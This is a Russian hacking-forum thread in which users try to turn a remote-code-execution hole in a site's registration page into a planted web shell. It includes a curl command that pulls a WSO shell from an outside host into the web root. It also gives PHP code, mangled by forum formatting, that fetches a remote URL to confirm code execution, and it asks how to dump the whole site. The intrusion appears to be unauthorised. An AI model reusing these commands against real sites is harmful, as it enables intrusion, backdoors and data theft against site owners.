Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Загрузка Shell через RCE (https://forum.antichat.xyz/showthread.php?t=459977)

Sensoft 28.01.2018 05:15

Через нетспаркер нашёл дыру RCE

через команду

Код:

Code:
дыра в регистрации

site.ru/register/jeks.php

site.ru/jeks.php

shell так и не залился искал по адресам которые выше

в чём проблема ?

Sensoft 28.01.2018 05:21

curl -s -k http://txt.731my.com/wso.txt >> /var/www/название сайта/data/www/название сайта.com/wso.php & echo done

тоже не катит

cat1vo 28.01.2018 05:29

[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]

Sensoft 28.01.2018 05:32

[QUOTE="cat1vo"]
cat1vo said:

[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]

aka PSIH 28.01.2018 07:37

то исполняется? Папка с правами для записи есть?

как вариант

pas9x 28.01.2018 08:24

ТС, ты хоть пхп для начала выучи, чтоли. Ты уже второй месяц чего-то там взламываешь. За это время можно-бы было выучить язык и больше никогда не создавать нубских топиков.

По сабжу.

Цитата:

Сообщение от Sensoft
Sensoft said:

нашёл дыру RCE

Для начала надо убедиться что пхп-код вообще выполняется на сервере. Если это RCE то запусти такой код:

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://site.ru/file.txt'[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$banned[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ini_get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'disable_functions'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]function_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'curl_init'[/COLOR][COLOR="#007700"]) && ![/COLOR][COLOR="#0000BB"]is_int[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$banned[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'curl_'[/COLOR][COLOR="#007700"]))) {
[/
COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
}
else {
[/
COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
}[/
COLOR][/COLOR

Ну или то-же самое под eval+base64. Затем идёшь в админку хостинга site.ru и смотришь в логе веб-сервера заходил-ли кто на /file.txt. Если в логе есть запись с этим uri - значит код на сервере запускается. Ели нет - либо функции заблокированы в disable_functions, либо вообще RCE не работает, что скорее всего.

Sensoft 28.01.2018 14:52

Цитата:

Сообщение от aka PSIH
aka PSIH said:

то исполняется? Папка с правами для записи есть?
как вариант

Вчера шуршал, папку с правами так и не увидел

теперь понятно почему я не мог загрузить shell

Sensoft 28.01.2018 14:56

Просматривать файлы я могу

Есть команда для того чтобы сдампить весь сайт ?

pas9x 28.01.2018 21:01

Цитата:

Сообщение от Sensoft
Sensoft said:

Есть команда для того чтобы сдампить весь сайт ?

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR


Sensoft 29.01.2018 03:08

Цитата:

Сообщение от pas9x
pas9x said:

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR


не катит


Время: 06:52